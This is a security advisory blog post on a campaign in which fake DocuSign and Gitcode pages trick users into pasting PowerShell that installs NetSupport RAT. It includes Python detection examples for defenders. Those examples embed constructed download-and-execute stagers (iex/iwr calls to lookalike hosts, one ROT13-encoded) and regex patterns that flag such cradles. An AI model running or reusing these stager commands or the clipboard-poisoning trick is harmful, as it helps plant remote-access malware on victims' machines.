Shane

The Weaponization of Trust: How Fake DocuSign and Gitcode Sites Deploy NetSupport RAT

Security Advisory: Fake DocuSign Sites Distribute NetSupport RAT Malware – Remote Access Trojan Deployment via Social Engineering

Cybercriminals have become adept at exploiting human psychology, and a recently documented campaign shows how far these techniques have developed. Security researchers have uncovered a threat in which fake DocuSign and Gitcode websites trick users into installing NetSupport RAT: the sites walk the victim through a fake "verification" step that ends with the victim running attacker-supplied PowerShell on their own machine.

 Description of the Threat

The campaign uses spoofed websites that closely mimic legitimate services such as DocuSign document verification pages and the Gitcode development platform. These sites use a multi-stage approach that begins with what looks like a routine CAPTCHA or human-verification check but actually starts a malware deployment chain. No software vulnerability is exploited, so the attack works on fully patched systems: the victim's own actions do the work.

When victims visit these sites, they see a convincing DocuSign verification page or Gitcode front end that asks them to complete a "verification" process. Users are told to tick a box or follow a few simple steps that seem routine but actually trigger clipboard poisoning: a technique in which script on the page writes a malicious PowerShell command to the user's clipboard. Browsers allow a page to write to the clipboard in response to a click, so no exploit or permission prompt is needed, and the user sees nothing unusual.

The attack then relies on the user following the on-screen instructions to open the Windows Run dialog (Win+R), paste the clipboard contents and press Enter. What they believe is a harmless verification code is in fact a PowerShell one-liner that acts as a downloader, fetching further stages from attacker infrastructure and ultimately installing NetSupport RAT on the machine. This pattern, in which the victim is talked into running the first stage themselves, is widely referred to as ClickFix.

 Severity of the Issue

This threat is a high-severity risk to organizations of all sizes. The campaign has several alarming characteristics:

  • Multi-stage evasion: the chain is split across several small downloads so that no single stage looks like a complete piece of malware to traditional security tools
  • Exploitation of trusted brands: by impersonating DocuSign and other familiar services, attackers borrow the trust users already place in those platforms
  • Broad targeting: the campaign affects education, government and business sectors indiscriminately
  • Persistent access: once installed, NetSupport RAT gives attackers comprehensive remote control of the host

The malware lets operators watch the victim's screen in real time, control the keyboard and mouse, upload and download files, capture screenshots and audio, and run commands, in effect complete control of the system. NetSupport RAT is a repurposed build of the legitimate NetSupport Manager remote-administration product, which is one reason signature-based tools often let it through.

 How the Attack is Exploited

The exploitation process follows a carefully orchestrated sequence:

  1. Initial Contact: Victims are most likely directed to the fake websites through email or social media lures, though the exact distribution method remains under investigation.
  2. Social Engineering: The fraudulent websites present convincing interfaces that mimic trusted services, complete with legitimate branding elements and familiar user interface designs.
  3. Clipboard Poisoning: When users interact with the fake CAPTCHA or verification prompt, the page's script writes a malicious PowerShell command to their clipboard. The command is stored ROT13-encoded in the page so that it does not stand out in the page source and is decoded just before it is copied; what lands on the clipboard is plain, directly runnable PowerShell, since the Run dialog would not decode it.
  4. User Manipulation: Victims are shown step-by-step instructions to open the Run dialog (Win+R), paste and press Enter, exploiting the natural tendency to follow procedural steps. Anything started this way runs as a child of the user's explorer.exe, which is a useful anchor for detection.
  5. Multi-Stage Deployment: The initial command downloads subsequent payloads from attacker-controlled or compromised infrastructure, with each stage kept small to evade detection and analysis.
  6. Persistence Establishment: The final payload installs NetSupport RAT and creates persistence through Windows Registry Run entries or Startup folder modifications.

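As an added example (not code from the original post or from the researchers whose findings it summarizes), the following Python shows the two technical pieces of steps 3 to 5: what the ROT13 layer hides and what the pasted command looks like once decoded, and a detection routine run over constructed process-creation records (the fields Sysmon Event ID 1 or Security Event 4688 provide) that flags script interpreters launched from explorer.exe, the parent of anything started through the Run dialog, with a download-and-execute command line. The obfuscated payload string, the hostnames and every event record are constructed for the example and are not indicators from the campaign.

```python
"""Triage helpers for the clipboard-to-Run-dialog chain described above.

Added example, not code from the original post. Every payload string, hostname
and event record below is constructed for illustration.
"""
import codecs
import re
from dataclasses import dataclass

# Constructed stand-in for the ROT13-obfuscated command a lure page keeps in its
# JavaScript; the page decodes it right before writing it to the clipboard.
OBFUSCATED_STAGER = (
    '''cbjrefuryy -j uvqqra -p "vrk (vje 'uggcf://qbphfvta-irevsl.rknzcyr/purpx.gkg').Pbagrag"'''
)


def decode_lure_payload(obfuscated: str) -> str:
    """Undo the ROT13 layer: this is the plain PowerShell the victim pastes into Win+R."""
    return codecs.decode(obfuscated, "rot_13")


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 / Security 4688 process-creation record."""
    record_id: int
    parent_image: str
    image: str
    command_line: str


# Anything started through the Run dialog is a child of the user's explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|irm|curl|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b",
        re.I,
    ),
    "inline_execute": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
URL = re.compile(r"""https?://[^\s'"()\\]+""", re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (record_id, indicators hit, urls) for Run-dialog launches of a download-and-execute command.

    Parent and image are checked first so that admin scripts started by a scheduled
    task or an IDE (different parents) are not flagged just for using iwr or iex.
    """
    findings = []
    for ev in events:
        if _basename(ev.parent_image) != RUN_DIALOG_PARENT or _basename(ev.image) not in INTERPRETERS:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
        if "download_cradle" in hits or "inline_execute" in hits:
            findings.append((ev.record_id, hits, URL.findall(ev.command_line)))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed records: two Run-dialog launches of a cradle amid normal activity.
SAMPLE_EVENTS = [
    ProcessEvent(1, EXPLORER, PS, decode_lure_payload(OBFUSCATED_STAGER)),
    ProcessEvent(2, r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe", PS,
                 "powershell -NoLogo -File .\\build.ps1"),
    ProcessEvent(3, EXPLORER, r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
    ProcessEvent(4, r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Inventory\collect.ps1"),
    ProcessEvent(5, EXPLORER, r"C:\Windows\System32\cmd.exe",
                 r'cmd /c "powershell -w 1 -nop -c \"iex(irm https://gitcode-check.example/a)\""'),
]

if __name__ == "__main__":
    print("clipboard contents:", decode_lure_payload(OBFUSCATED_STAGER))
    for record_id, hits, urls in triage(SAMPLE_EVENTS):
        print(f"record {record_id}: {', '.join(hits)}; urls={urls}")
```

Records 1 and 5 are flagged; record 5 shows why cmd.exe belongs in the interpreter set, since a pasted command is often wrapped in cmd /c. Records 2 and 4 use the same cmdlets legitimately but have a different parent, which is what keeps the rule quiet on admin tooling. The ROT13 layer is worth remembering during analysis: it hides the command from a casual look at the page source, but the clipboard and the process command line both carry the decoded text.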
 Who is Behind the Attack

The specific threat actors have not been identified, but security researchers observed overlaps with known cybercriminal operations. The campaign shares infrastructure patterns and techniques with SocGholish (FakeUpdates), a long-running malware distribution operation that was also seen delivering NetSupport RAT in late 2024. The quality of the lookalike sites and the multi-stage delivery chain point to an experienced group rather than an opportunistic one.

The attack infrastructure relies on domains registered through mainstream providers such as Cloudflare, NameCheap and NameSilo, a deliberate choice that lets the sites blend in with legitimate web traffic. That is a practical point for defenders: the registrar or CDN in front of a site says nothing about its trustworthiness, so filtering has to work at the level of newly registered and lookalike domains rather than hosting provider.

 Who is at Risk

Small and Medium Businesses: These organizations often lack comprehensive security awareness training and advanced threat detection capabilities, making them prime targets for social engineering attacks.

Educational Institutions: Schools and universities frequently handle document sharing and verification processes, making fake DocuSign sites particularly convincing to staff and students.

Government Agencies: Public sector organizations that regularly process official documents may be especially vulnerable to DocuSign impersonation attacks.

Healthcare Organizations: Medical facilities that handle patient documentation and compliance requirements represent high-value targets for remote access attacks.

Professional Services: Law firms, consulting companies, and other professional service providers that routinely use document signing platforms face elevated risk.

Any organization or individual that regularly interacts with document verification services or development platforms should consider themselves potential targets for this type of attack.

 Remediation Strategies

Immediate Actions:

  • Deploy endpoint detection and response (EDR) tooling and tune it for this chain: script interpreters (powershell.exe, cmd.exe, mshta.exe) spawned by explorer.exe, hidden-window flags, and download cradles piped to Invoke-Expression
  • Deploy email and web filtering to block the lures that direct users to these sites
  • Treat the PowerShell execution policy as a convenience setting, not a security boundary: the text pasted into the Run dialog is a command line rather than a script file, so the policy does not apply to it, and an attacker-supplied command can pass -ExecutionPolicy Bypass in any case. Put the effort into script block logging, AMSI-integrated endpoint protection and Constrained Language Mode instead
  • Monitor outbound connections for first-seen and lookalike domains, not only domains already on a blocklist

Security Awareness Measures:

  • Conduct regular training sessions focusing on social engineering recognition, particularly fake verification prompts
  • Implement simulated phishing exercises that include fake document verification scenarios
  • Educate users about the risks of copying and pasting unknown content into system commands
  • Create clear protocols for verifying legitimate document signing requests through independent channels

Technical Controls:

  • Enable Windows Defender Application Control (WDAC) or similar application allowlisting; under an enforced WDAC policy PowerShell runs in Constrained Language Mode, which limits what the downloaded stages can do
  • Remove the Run dialog for users who have no need for it with the Group Policy setting "Remove Run menu from Start Menu" (the NoRun Explorer policy); it also disables Win+R and so removes the exact step the lure depends on
  • Implement DNS filtering to block access to known malicious domains and newly registered or lookalike domains
  • Deploy user and entity behavior analytics (UEBA) to detect unusual system access patterns
  • Establish privileged access management (PAM) to limit the impact of a compromised user account

Monitoring and Response:

  • Configure the security information and event management (SIEM) system to alert on process creation (Sysmon Event ID 1 or Security Event 4688) where explorer.exe is the parent of powershell.exe, cmd.exe or mshta.exe and the command line contains a download cradle (iwr, irm, DownloadString) or Invoke-Expression, and on unexpected outbound connections from those processes
  • Enable PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) so the decoded content of each downloaded stage is recorded even when the command line is obfuscated
  • Implement file integrity monitoring to detect unauthorized changes to system files, Run keys and Startup folders
  • Establish incident response procedures for remote access trojan infections: assume the operator had an interactive session, rotate every credential used on the host, and review what was touched
  • Build forensic playbooks for multi-stage chains: the current user's RunMRU key records what was pasted into the Run dialog, and script block logs preserve the stages that were fetched
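As an added example (not from the original post), this Python reads a .reg export of the current user's RunMRU key, the place Windows records commands typed or pasted into the Run dialog, rebuilds the order from the MRUList value and flags entries that invoke a script interpreter or fetch a URL. The export below is constructed for the example; on a real host the key is HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and since only the key's last-write time dates the newest entry, pair it with PowerShell script block logs to build a timeline.

```python
r"""RunMRU triage for the Run-dialog step of the chain described above.

Added example, not code from the original post. The registry export below is
constructed; on a real host obtain one with
  reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg
"""
import re

# "name"="data" lines of a .reg export; data uses \\ and \" escapes.
REG_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
REG_ESCAPE = re.compile(r'\\(["\\])')

# Interpreters and fetch primitives that have no business in an ordinary user's Run history.
SUSPICIOUS = re.compile(
    r"\b(?:powershell|pwsh|mshta|cmd|wscript|cscript|curl|iwr|irm|iex|invoke-\w+)\b|https?://",
    re.I,
)

# Constructed export: three benign entries and one pasted stager (hostname is made up).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="\\\\fileserver\\finance\\1"
"c"="powershell -w hidden -c \"iex (iwr 'https://docusign-verify.example/check.txt').Content\"\\1"
"d"="calc\\1"
"MRUList"="cdba"
'''


def parse_runmru(reg_text: str):
    """Return [(slot, command)] in the order the user ran them, most recent first.

    Each slot value is the command followed by a literal "\\1"; MRUList holds the
    slot letters newest-first. There are no per-entry timestamps: only the key's
    last-write time dates the newest entry.
    """
    values = {}
    for line in reg_text.splitlines():
        m = REG_VALUE.match(line.strip())
        if m:
            values[m["name"]] = REG_ESCAPE.sub(r"\1", m["data"])
    order = values.pop("MRUList", "")
    history = []
    for slot in order:
        command = values.get(slot, "")
        if command.endswith("\\1"):
            command = command[:-2]
        history.append((slot, command))
    return history


def flag_runmru(reg_text: str):
    """Entries that invoke a script interpreter or fetch a URL, most recent first."""
    return [(slot, cmd) for slot, cmd in parse_runmru(reg_text) if SUSPICIOUS.search(cmd)]


if __name__ == "__main__":
    for slot, cmd in parse_runmru(SAMPLE_EXPORT):
        marker = "!!" if SUSPICIOUS.search(cmd) else "  "
        print(f"{marker} {slot}: {cmd}")
```

The parser keeps the UNC path and the built-in tools in the history unflagged and surfaces only the pasted stager, which in the constructed export is also the newest entry. When the key is collected from a live system rather than an export, the value names and the MRUList layout are the same, so the same ordering logic applies.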

 How CinchOps Can Help Secure Your Business

In today’s threat environment, defending against sophisticated social engineering attacks requires more than traditional security measures—it demands a comprehensive, human-centered approach to cybersecurity. CinchOps understands that your employees are both your greatest asset and your most vulnerable attack surface, which is why our security solutions focus on protecting your people while strengthening your technical defenses.

Our cybersecurity experts work with you to build a robust defense strategy that addresses both the technical and human elements of modern threats:

  • Advanced Threat Detection and Response – Deploy EDR tooling that identifies and stops multi-stage delivery chains like the one carrying NetSupport RAT before the payload establishes persistence on your systems
  • Comprehensive Security Awareness Training – Implement ongoing education programs that teach your team to recognize and respond appropriately to social engineering attempts, including fake verification sites and document signing scams
  • Email and Web Security – Install enterprise-grade filtering solutions that block malicious links and attachments while providing real-time protection against emerging threats
  • Endpoint Protection and Management – Secure every device in your organization with advanced antimalware, application control, and behavioral monitoring capabilities
  • Network Security Monitoring – Establish 24/7 monitoring of your network traffic to detect and respond to suspicious activities, including command and control communications
  • Incident Response Planning – Develop and test comprehensive response procedures to minimize damage and recovery time in the event of a successful attack
  • Vulnerability Management – Maintain current security patches and configurations across your entire IT infrastructure to prevent exploitation of known vulnerabilities
  • Security Policy Development – Create and enforce security policies that address document handling, software installation, and user access controls
  • Compliance and Risk Assessment – Ensure your security measures meet industry standards and regulatory requirements while identifying areas for improvement

With cyber threats becoming increasingly sophisticated and targeting human psychology rather than just technology, you need a security partner who understands both the technical and behavioral aspects of cybersecurity. CinchOps combines decades of IT experience with cutting-edge security technology to protect your business from today’s most dangerous threats while preparing you for tomorrow’s challenges.


 Discover More 

Discover more about our enterprise-grade and business protecting cybersecurity services: CinchOps Cybersecurity
Discover related topics: Hackers Disguise Malicious Login Pages as Microsoft OneNote to Steal Corporate Credentials
For Additional Information on this topic: How Threat Actors Exploit Human Trust: A Breakdown of the ‘Prove You Are Human’ Malware Scheme
